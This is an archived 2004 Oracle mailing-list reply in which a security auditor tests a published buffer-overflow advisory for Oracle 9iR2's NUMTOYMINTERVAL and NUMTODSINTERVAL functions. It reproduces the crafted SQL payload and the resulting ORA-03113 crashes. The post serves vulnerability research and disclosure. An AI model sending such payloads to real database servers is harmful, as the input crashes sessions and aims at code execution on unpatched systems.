Home
All Oracle Error Codes
Oracle DBA Forum

Frequent Oracle Errors

TNS:could not resolve the connect identifier specified
Backtrace message unwound by exceptions
invalid identifier
PL/SQL compilation error
internal error
missing expression
table or view does not exist
end-of-file on communication channel
TNS:listener unknown in connect descriptor
insufficient privileges
PL/SQL: numeric or value error string
TNS:protocol adapter error
ORACLE not available
target host or object does not exist
invalid number
unable to allocate string bytes of shared memory
resource busy and acquire with NOWAIT specified
error occurred at recursive SQL level string
ORACLE initialization or shutdown in progress
archiver error. Connect internal only, until freed
snapshot too old
unable to extend temp segment by string in tablespace
Credential retrieval failed
missing or invalid option
invalid username/password; logon denied
unable to create INITIAL extent for segment
out of process memory when trying to allocate string bytes
shared memory realm does not exist
cannot insert NULL
TNS:unable to connect to destination
remote database not found ora-02019
exception encountered: core dump
inconsistent datatypes
no data found
TNS:operation timed out
PL/SQL: could not find program
existing state of packages has been discarded
maximum number of processes exceeded
error signaled in parallel query server
ORACLE instance terminated. Disconnection forced
TNS:packet writer failure
see ORA-12699
missing right parenthesis
name is already used by an existing object
cannot identify/lock data file
invalid file operation
quoted string not properly terminated

Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow

Pete Finnigan

2004-02-26

Replies:
Hi Jared,

I heard about this issue in early Feb. This guy Cesar Cerrudo posted a
message to vulnwatch about these two vulnerabilities and also said he
had a lot more. I saw a post on Bugtraq yesterday where someone was
asking for the patch info. It is not clear if an Oracle fix matches this
bug or not and which patch applies. There is no advisory.

Here is the header info from vulnwatch from his post. I have the full
email sent to vulnwatch which is similar to Jared's version on
securiteam but is longer (no extra technical details mostly rants)

<quote>
From:  Cesar [mailto:cesarc56@(protected)]
Sent:  Thu 2004-02-05 3:15 PM
To:   vulnwatch@(protected)
Cc:  
Subject:     [VulnWatch] Oracle Database 9ir2 Interval Conversion
Functions Buffer Overflow
Security Advisory

Name: Oracle Database 9ir2 Interval Conversion
Functions Buffer Overflow.
System Affected : Oracle Database 9ir2, previous
versions could be affected too.
Severity : High
Remote exploitable : Yes
Author:   Cesar Cerrudo.
Date:   02/05/04
Advisory Number:   CC020401
</quote>


Anyway I have run the following test based on what he said in his
advisory:

SQL> edit
Wrote file afiedt.buf

1 SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJK
LMNOPQR'
2 || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)|
|chr(18)||chr(80)||chr(255)|
3 ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)|
|chr(33)||chr(148)||chr(01)|
4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
SQL> /
ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
                             *
ERROR at line 4:
ORA-03113: end-of-file on communication channel


SQL> select sysdate from dual;
select sysdate from dual
*
ERROR at line 1:
ORA-03114: not connected to ORACLE


SQL>
SQL> connect system/manager@(protected)
Connected.
SQL> edit
Wrote file afiedt.buf

1 SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJK
LMNOPQR'
2 || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)|
|chr(18)||chr(80)||chr(255)|
3 ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)|
|chr(33)||chr(148)||chr(01)|
4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
SQL> /
SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOP
QR'
*
ERROR at line 1:
ORA-03113: end-of-file on communication channel


SQL> select sysdate from dual;
select sysdate from dual
*
ERROR at line 1:
ORA-03114: not connected to ORACLE


SQL>

So yes both of these vulnerabilities will terminate the Oracle
connection so its possible it could be exploited remotely. The file >
c:\Unbreakable.txt is not created though. I have not tried under a
debugger to see if anything can be done with the 3113 error in terms of
exploiting the stack. If this is a true buffer overflow exploit then he
would need to pass some sort of shell code and manipulate the stack to
run it. Maybe his chr(??) are some sort of shell code for it to be a
buffer overflow and capture the machine. On the surface it doesn't seem
to work though.

SQL*net trace didn't tell me much and also an Oracle core is created in
the cdump directory with the are you sure text on the top of the stack.
I ran this on XP 9ir2 personal edition.

Kind regards

Pete
--
Pete Finnigan
email:pete@(protected)
Web site: http://www.petefinnigan.com - Oracle security audit specialists
Book:Oracle security step-by-step Guide - see http://store.sans.org for details.

----------------------------------------------------------------
Please see the official ORACLE-L FAQ: http://www.orafaq.com
----------------------------------------------------------------
To unsubscribe send email to: oracle-l-request@(protected)
put 'unsubscribe' in the subject line.
--
Archives are at http://www.freelists.org/archives/oracle-l/
FAQ is at http://www.freelists.org/help/fom-serve/cache/1.html
-----------------------------------------------------------------